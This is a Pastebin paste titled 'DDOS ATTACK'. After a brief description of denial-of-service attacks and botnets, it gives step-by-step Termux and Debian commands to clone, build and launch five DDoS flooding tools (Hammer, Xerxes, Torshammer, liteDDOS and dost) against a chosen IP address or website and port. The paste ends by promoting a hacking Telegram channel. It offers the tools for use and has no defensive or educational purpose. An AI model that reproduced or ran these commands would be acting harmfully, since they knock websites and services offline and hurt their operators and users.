Advertisement
Ben_salam

DDOS ATTACK

Feb 24th, 2020
5,015
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. How to do a DDOS attack via Termux & GNUROOT DEBIAN
  2.  
  3.  
  4. What is a DDoS?
  5.  
  6. By carrying out a "denial of service attack" (DDoS), attackers aim to flood servers or computer systems with a large number of requests until they make their services and websites unavailable or other Internet services more accessible.
  7.  
  8. Such DDoS attacks are often based on personal, political or economic interests on the part of the attackers. For this reason, DDoS attacks are generally not directed against providers, but rather against the websites hosted by the provider that are to be harmed by the attack.
  9.  
  10. How do attackers carry out DDoS attacks?
  11.  
  12. For such a DDoS attack, criminals use specific malware that infects hundreds of unprotected computers and has control over them. Several infected computers then form a botnet that Internet criminals use to attack servers en masse. To boycott an intranet site, "captured" computers send data packets to the web server in question until the web server no longer has the capacity to process the data and must interrupt its service.
  13.  
  14. 1. Hammer
  15. pkg update
  16. $ pkg upgrade
  17. $ pkg install python
  18. pkg install git
  19. $ git clone https://github.com/cyweb/hammer
  20. $ cd hammer
  21. $ python hammer.py
  22. python hammer.py -s [IP address] -p [port] -t 135
  23.  
  24. 2. Xerxes
  25. $ apt install git
  26. $ apt install clang
  27. $ git clone https://github.com/zanyarjamal/xerxes
  28. $ ls
  29. $ cd xerxes
  30. $ ls
  31. $ clang xerxes.c -o xerxes
  32. $ ls
  33. /xerxes www.site.com 80
  34.  
  35. 3. Torshammer
  36. pkg update
  37. pkg install git
  38. apt install tor
  39. pkg install python2
  40. $ git clone https://github.com/dotfighter/torshammer.git
  41. $ ls
  42. $ cd torshammer
  43. $ python2 torshammer.py
  44.  
  45. 4. liteDDOS
  46. $ apt update
  47. $ apt upgrade
  48. pkg install git
  49. pkg install python2
  50. $ git clone https://github.com/4L13199/LITEDDOS
  51. $ cd LITEDDOS
  52. $ python2 liteDDOS.py
  53.  
  54. 5.Ddos attack by dost
  55. $ git clone https://github.com/verluchie/dost-attack
  56.  
  57. $ cd dost-attack
  58. $ chmod 777 dost
  59. ./install.sh
  60. $ dost
  61.  
  62.  
  63.  
  64. GitHub
  65. cyweb/hammer
  66. Hammer DDos Script - Python 3. Contribute to cyweb/hammer development by creating an account on GitHub.
  67.  
  68.  Join our telegram channel
  69. http://t.me/Learnfreehacking0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement